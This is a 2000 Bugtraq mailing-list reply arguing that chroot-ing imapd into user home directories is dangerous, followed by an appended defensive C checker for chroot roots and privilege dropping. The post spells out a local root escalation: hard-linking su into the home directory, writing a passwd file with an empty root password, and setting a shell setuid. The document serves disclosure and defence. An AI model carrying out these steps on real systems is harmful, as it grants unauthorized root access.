[14565] in bugtraq


Re: response to the bugtraq report of buffer overruns in imapd

daemon@ATHENA.MIT.EDU (R. C. Dowdeswell)
Wed Apr 19 04:13:53 2000

Message-Id:  <20000418060249.00EB0DBB@mabelode.imrryr.org>
Date:         Mon, 17 Apr 2000 23:02:48 -0700
Reply-To: "R. C. Dowdeswell" <elric@imrryr.org>
From: "R. C. Dowdeswell" <elric@MABELODE.IMRRYR.ORG>
X-To:         Mark Crispin <MRC@CAC.WASHINGTON.EDU>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  Your message of "Mon, 17 Apr 2000 18:24:59 PDT." <MailManager.956021099.15421.mrc@Ikkoku-Kan.Panda.COM>

On 956021099 seconds since the Beginning of the UNIX epoch
Mark Crispin wrote:
>
>The final form of the CHROOT_SERVER code, which will be an option in the next
>distributed version, consists of:
>  if (chroot (home ? home : ANONYMOUSHOME)) return NIL;
>  home = "/";
>And, yes, this will do the necessary chdir().

chroot(2)'ing to a user's home directory is rather a bad idea in a lot of
setups.  For example, assume that the machine has one large disk and one
partition.  Then a decent number of unices would be vulnerable (on a
shell-enabled machine) to:

$ cd                              # the home directory, i.e. the future chroot root
$ mkdir etc
$ ln /usr/bin/su                  # hard link: only works when / and $HOME share one filesystem
$ cp /bin/sh .
$ echo 'root::...' > etc/passwd   # root entry with an empty password, read by su inside the jail

IMAP in, get into a chroot(2) jail in your home dir, get a shell, su.
Then

 # chmod 4755 sh

Using chroot in a lot of situations is rather dangerous, and one
must carefully set up the environment that it runs in.

IIRC, the default install of some unices/linuces is to have only one
partition.

 == Roland Dowdeswell                      http://www.Imrryr.ORG/~elric/  ==
 == The Unofficial NetBSD Web Pages        http://www.Imrryr.ORG/NetBSD/  ==
 == The NetBSD Project                            http://www.NetBSD.ORG/  ==
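Added example (not part of this thread, and not the imapd CHROOT_SERVER code Mark Crispin describes): the two checks a daemon author would want before taking the quoted chroot() path. same_device() tests the precondition for the attack above, namely that "ln /usr/bin/su" into $HOME can succeed at all, which requires the two paths to sit on one filesystem; chroot_dir_ok() refuses any chroot root that is not root-owned and unwritable by others, which a user's home directory fails by construction; enter_jail() shows the order chroot(), chdir("/"), drop groups/gid/uid. The function names, the EACCES convention and the default "/tmp" argument are this example's own choices.

```c
#define _GNU_SOURCE 1   /* chroot() and setgroups() are not in strict ISO C headers */
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Precondition for the attack in the post: a hard link of /usr/bin/su into
 * $HOME only succeeds if both paths live on the same filesystem (same st_dev).
 * Returns 1 if they share a device, 0 if not, -1 if either path cannot be stat'ed.
 */
int same_device(const char *a, const char *b)
{
    struct stat sa, sb;
    if (stat(a, &sa) != 0 || stat(b, &sb) != 0)
        return -1;
    return sa.st_dev == sb.st_dev;
}

/*
 * Accept a directory as a chroot root only if it exists, is a directory,
 * is owned by root, and is not writable by group or other.  A user's home
 * directory fails this because the user owns it, which is exactly the setup
 * the post shows being abused.  Returns 1 if acceptable, else 0 with the
 * reason stored in *why (when why is non-NULL).
 */
int chroot_dir_ok(const char *dir, const char **why)
{
    struct stat st;
    const char *reason = NULL;

    if (stat(dir, &st) != 0)
        reason = strerror(errno);
    else if (!S_ISDIR(st.st_mode))
        reason = "not a directory";
    else if (st.st_uid != 0)
        reason = "not owned by root";
    else if (st.st_mode & (S_IWGRP | S_IWOTH))
        reason = "writable by group or other";

    if (why)
        *why = reason;
    return reason == NULL;
}

/*
 * Enter the jail and drop privileges.  Order matters: chroot() while still
 * root, chdir("/") so the working directory is inside the new root, then shed
 * supplementary groups, gid and uid (gid first, since setuid() would lose the
 * right to change groups).  Returns 0 on success, -1 on failure with errno
 * set by the failing call, or EACCES when the directory is rejected.
 */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    const char *why;

    if (!chroot_dir_ok(dir, &why)) {
        fprintf(stderr, "refusing to chroot to %s: %s\n", dir, why);
        errno = EACCES;
        return -1;
    }
    if (chroot(dir) != 0 || chdir("/") != 0)
        return -1;
    if (setgroups(0, NULL) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    return 0;
}

int main(int argc, char **argv)
{
    /* Usage: ./jailcheck DIR  -- reports whether DIR would be accepted as a jail root. */
    const char *dir = argc > 1 ? argv[1] : "/tmp";
    const char *why;

    printf("%s and /usr/bin/su on the same device: %d\n",
           dir, same_device(dir, "/usr/bin/su"));
    if (chroot_dir_ok(dir, &why))
        printf("%s is an acceptable chroot root\n", dir);
    else
        printf("%s rejected: %s\n", dir, why);
    return 0;
}
```

Run it as ./jailcheck /home/someuser on a one-partition box and both messages come out the way the post predicts: the directory shares a device with su, and it is rejected because it is not root-owned. enter_jail() needs root to do anything useful and is shown for the ordering only.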
